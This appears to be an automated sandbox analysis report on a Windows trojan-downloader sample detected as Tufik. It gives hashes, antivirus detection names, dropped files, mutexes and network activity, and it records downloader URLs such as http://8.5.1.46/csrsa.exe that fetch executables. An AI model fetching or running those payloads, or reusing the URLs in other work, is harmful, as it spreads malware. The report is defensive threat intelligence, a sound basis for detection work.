Analysis Date: 2015-01-21 10:03:54
MD5: 66c2c6c3dbeb06144442dbc43f49cf30
SHA1: f0c423207c282f9df1058d9834936f663ee78007

Static Details:

File type: PE32 executable for MS Windows (GUI) Intel 80386 32-bit
Section .text  md5: c7183e3bbc2efd709e93caa2aa44a1b2 sha1: ea4c61161ffc63d2d607f1afc280fad77aaf51c9 size: 37376
Section .rdata md5: 9229e11cae2b383e1a604049bdc4d2dc sha1: db6b8ccfdcca2e65ebb079983672437df88be11a size: 8704
Section .data  md5: e2653c64ab28c67fa8d441df896da919 sha1: 7d744210ff002dfd0c9f280d1f2c044551293122 size: 4096
Section .rsrc  md5: f130297701bb2cf903b6d2004528d193 sha1: 44a8a25a51d3e51b4d604ef1bffff36e766e4a4d size: 15872
Section .text  md5: 527bcb04a3e738364c3e34879cfd2600 sha1: f156dfff5086c3f21f20e1b0f84cbe9f73c421c6 size: 5120
Timestamp: 2013-02-19 09:34:16
Version:
  LegalCopyright: Copyright 酷狗计算机科技有限公司(C) 2013
  InternalName: RunGame
  FileVersion: 1, 0, 0, 1
  CompanyName: 酷狗计算机科技有限公司
  Comments: 酷狗计算机科技有限公司
  ProductName: simdown 应用程序
  ProductVersion: 1, 0, 0, 1
  FileDescription: RunGame 应用程序
  OriginalFilename: RunGame.exe
PEhash: a3a300a5aff3bee511fe1c5dfff286fcda2d91ac
IMPhash: 17ea0951b5b79b4cac9a74b3a020bfbb
AV 360 Safe: Virus.Win32.TuFik.C
AV Ad-Aware: Win32.Tufik.P
AV Alwil (avast): Tufik:Win32:Tufik
AV Arcabit (arcavir): Win32.Tufik.P
AV Authentium: W32/Tufik.A.gen!Eldorado
AV Avira (antivir): TR/Dldr.Genome.agor
AV BullGuard: Win32.Tufik.P
AV CA (E-Trust Ino): Win32/tufik.J
AV CAT (quickheal): W32.Tufik.gen
AV ClamAV: Trojan.Downloader-98394
AV Dr. Web: Trojan.DownLoader.4268
AV Emsisoft: Win32.Tufik.P
AV Eset (nod32): Win32/Tufik.NAA virus
AV Fortinet: W32/Fujacks.BF!tr
AV Frisk (f-prot): W32/Tufik.A.gen!Eldorado
AV F-Secure: Win32.Tufik.P
AV Grisoft (avg): Win32/Tufik.A
AV Ikarus: Virus.Win32.Tufik
AV K7: Trojan-Downloader ( 00132cab1 )
AV Kaspersky: Virus.Win32.Pioneer.ak
AV MalwareBytes: no_virus
AV Mcafee: W32/Tufik
AV Microsoft Security Essentials: Error Scanning File
AV MicroWorld (escan): Win32.Tufik.P
AV Rising: Win32.Tufik.p
AV Sophos: W32/Tufik-Fam
AV Symantec: W32.Tufik.B!inf
AV Trend Micro: PE_TUFIK.JK-1
AV VirusBlokAda (vba32): Virus.Expiro.ad

Runtime Details:

Process
↳ C:\malware.exe

Creates File: C:\Documents and Settings\Administrator\Local Settings\Temp\WERfd9e.dir00\wuauclt.exe.mdmp
Creates File: C:\Documents and Settings\Administrator\Local Settings\Temp\WERfd9e.dir00\wuauclt.exe.hdmp
Creates File: \Device\Afd\Endpoint
Creates File: C:\Documents and Settings\Administrator\Local Settings\Application Data\Adobe\Reader 9.3\Setup Files\Setup.exe
Creates File: \Device\Afd\AsyncConnectHlp
Deletes File: C:\Documents and Settings\Administrator\Local Settings\Temp\tpm1.tmp
Creates Mutex: open
Creates Mutex: simdownmutex
Winsock DNS: 8.5.1.46
Winsock URL: http://downmini.kugou.com/GouWo_1201.exe
Winsock URL: http://8.5.1.46/csrsa.exe

Process
↳ C:\Program Files\Internet Explorer\iexplore.exe

Registry: HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main\Window_Placement ➝ NULL
Registry: HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Toolbar\Locked ➝ 1
Creates File: C:\Documents and Settings\Administrator\Local Settings\History\History.IE5\index.dat
Creates File: C:\Documents and Settings\Administrator\Cookies\index.dat
Creates File: PIPE\lsarpc
Creates File: C:\Documents and Settings\Administrator\Local Settings\Temporary Internet Files\Content.IE5\index.dat
Creates Mutex: c:!documents and settings!administrator!local settings!history!history.ie5!
Creates Mutex: WininetConnectionMutex
Creates Mutex: c:!documents and settings!administrator!cookies!
Creates Mutex: c:!documents and settings!administrator!local settings!temporary internet files!content.ie5!
Creates Mutex: _SHuassist.mtx
Creates Mutex: Shell.CMruPidlList

Network Details:

DNS: 85773.com (Type: A) ➝ 8.5.1.46
DNS: kgnop1.kugou.com (Type: A) ➝ 112.90.229.27
DNS: kgnop1.kugou.com (Type: A) ➝ 112.90.228.6
DNS: kgnop1.kugou.com (Type: A) ➝ 112.90.228.7
DNS: downmini.kugou.com (Type: A)
HTTP GET: http://8.5.1.46/csrsa.exe
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727)
HTTP GET: http://downmini.kugou.com/GouWo_1201.exe
User-Agent:
Flows TCP: 192.168.1.1:1032 ➝ 8.5.1.46:80
Flows TCP: 192.168.1.1:1033 ➝ 112.90.229.27:80

Raw Pcap

Strings